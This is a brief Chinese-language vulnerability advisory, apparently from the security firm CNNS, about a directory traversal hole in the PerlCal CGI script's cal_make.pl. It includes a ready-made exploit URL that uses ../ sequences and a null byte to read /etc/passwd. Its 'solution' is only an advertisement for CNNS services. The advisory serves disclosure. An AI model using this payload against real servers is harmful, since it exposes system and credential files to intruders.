涉及程序: PerlCal 详细: 今天发现某些运行 PerlCal ( http://www.perlcal.com ) 脚本的 WEB 服务器存在目录遍历漏洞,此漏洞是该脚本的 cal_make.pl 文件引起的。攻击者通过提交构造特殊的 URL 能浏览 WEB 服务器上的任何文件: http://www.VULNERABLE.com/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 这将会显示 /etc/passwd 文件 受影响系统: 运行 PerlCal CGI 脚本的 *NIX 系统 解决方案: CNNS 为您提供完善的网络安全服务